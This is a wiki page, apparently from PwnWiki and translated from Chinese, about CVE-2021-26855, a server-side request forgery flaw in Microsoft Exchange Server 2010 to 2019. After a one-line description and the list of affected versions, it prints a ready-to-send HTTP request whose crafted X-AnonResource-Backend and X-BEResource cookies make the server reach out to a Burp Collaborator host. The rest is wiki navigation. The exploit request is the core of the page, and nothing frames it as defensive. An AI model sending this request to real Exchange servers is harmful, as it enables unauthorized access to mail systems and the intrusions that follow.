CVE-2021-26855-Exchange Server SSRF vulnerability

This page is a translated version of the page CVE-2021-26855 - Exchange Server SSRF漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎English • ‎українська • ‎中文（台灣）‎ • ‎中文（繁體）‎ • ‎粵語

Introduction to Vulnerability

Exchange server-side request forgery (SSRF) vulnerability, an attacker exploiting this vulnerability can send arbitrary HTTP requests and authenticate through Exchange Server.

Scope of influence

Microsoft Exchange Server: 2010

Microsoft Exchange Server: 2013

Microsoft Exchange Server: 2016

Microsoft Exchange Server: 2019

SSRF

GET /owa/auth/x.js HTTP/1.1
Host: 0.0.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close

檔案:Ssrf.jpg

Anonymous

Search

CVE-2021-26855-Exchange Server SSRF vulnerability

Namespaces

More

Page actions

Introduction to Vulnerability

Scope of influence

SSRF

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

CVE-2021-26855-Exchange Server SSRF vulnerability

Introduction to Vulnerability

Scope of influence

SSRF

Navigation

Wiki tools

Page tools